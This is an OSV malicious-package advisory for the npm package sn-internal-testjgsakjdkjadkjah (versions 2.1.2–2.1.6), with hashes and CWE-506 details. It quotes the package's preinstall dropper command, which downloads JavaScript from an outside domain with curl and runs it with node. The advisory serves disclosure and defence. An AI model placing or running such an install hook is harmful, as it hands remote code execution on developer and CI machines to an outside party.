MAL-2026-6265

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sn-internal-testjgsakjdkjadkjah/MAL-2026-6265.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6265

Published

2026-06-22T17:37:41Z

Modified

2026-06-22T18:31:22.913506255Z

Summary

Malicious code in sn-internal-testjgsakjdkjadkjah (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261)

package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, this downloads JavaScript from poc.amanrawat.com over an unpinned, unverified URL, overwrites the package's index.js with the fetched bytes, and immediately executes them with node under the installer's user privileges. The destination is a personal domain unrelated to any legitimate publisher infrastructure, the content is mutable (whatever bytes are served at request time are executed), and there is no hash, signature, or version pin. This is a textbook install-time remote code execution dropper: the attacker controlling poc.amanrawat.com can run arbitrary code on every machine that installs this package, including developer workstations and CI systems. Package metadata (name sn-internal-testjgsakjdkjadkjah, description 'This is our internal app for testing', author amanrawat matching the fetch domain) suggests a proof-of-concept publication, but the install-time behavior is functionally identical to a malicious dropper regardless of author intent.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "104d861afe48d8f90ff5241fd3c0324be8825e37e81dcf868585e4171658054b",
            "import_time": "2026-06-22T18:25:28.42718717Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:37:44Z",
            "versions": [
                "2.1.6"
            ],
            "id": "IN-MAL-2026-007143"
        },
        {
            "sha256": "7f6f1799ff0887b36122e417538f8bc76047b032dc1aa72837128f81fc04b377",
            "versions": [
                "2.1.4"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:37:42Z",
            "id": "IN-MAL-2026-007140",
            "import_time": "2026-06-22T18:25:28.132689822Z"
        },
        {
            "source": "amazon-inspector",
            "versions": [
                "2.1.5"
            ],
            "id": "IN-MAL-2026-007141",
            "modified_time": "2026-06-22T17:37:42Z",
            "import_time": "2026-06-22T18:25:28.244241318Z",
            "sha256": "a35eca57d05f39239e4d349c590b7ca3ec3ea8a1824d67187cc2291708be83b9"
        },
        {
            "sha256": "fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261",
            "versions": [
                "2.1.3"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:37:43Z",
            "import_time": "2026-06-22T18:25:28.324275673Z",
            "id": "IN-MAL-2026-007142"
        },
        {
            "sha256": "3133d2680df3f93221fb38517609280f9f443360719c5be25b13d89107f25a7c",
            "versions": [
                "2.1.2"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:37:41Z",
            "id": "IN-MAL-2026-007139",
            "import_time": "2026-06-22T18:25:28.045559048Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / sn-internal-testjgsakjdkjadkjah

Package

Name: sn-internal-testjgsakjdkjadkjah; View open source insights on deps.dev
Purl: pkg:npm/sn-internal-testjgsakjdkjadkjah

Affected ranges

Affected versions

2.*

2.1.2

2.1.3

2.1.4

2.1.5

2.1.6

Database specific

indicators

{
    "package_integrity": [
        {
            "filename": "sn-internal-testjgsakjdkjadkjah-2.1.6.tgz",
            "hashes": {
                "sha512_sri": "sha512-HTMhlQASaKYFxG8WHa8n9w5AWtm/lVLARi51jC+piA6hc1/kBwI8QqwaIPwXUF4nY3pPanBIDqR4pebveM5cTA==",
                "sha1": "6f17c4c0b742f3850938f5aaa151f542267d2187"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "0d87ef2487058e34acf3709d5415d97390553973ecc741f3e3cede8fdb5eb463",
            "tlsh": "d6e0c0318b23513745c011a2cc6a880fc6928e2f00057c0863af012c80cf17398fe31c",
            "path": "package.json"
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/sn-internal-testjgsakjdkjadkjah/MAL-2026-6265.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]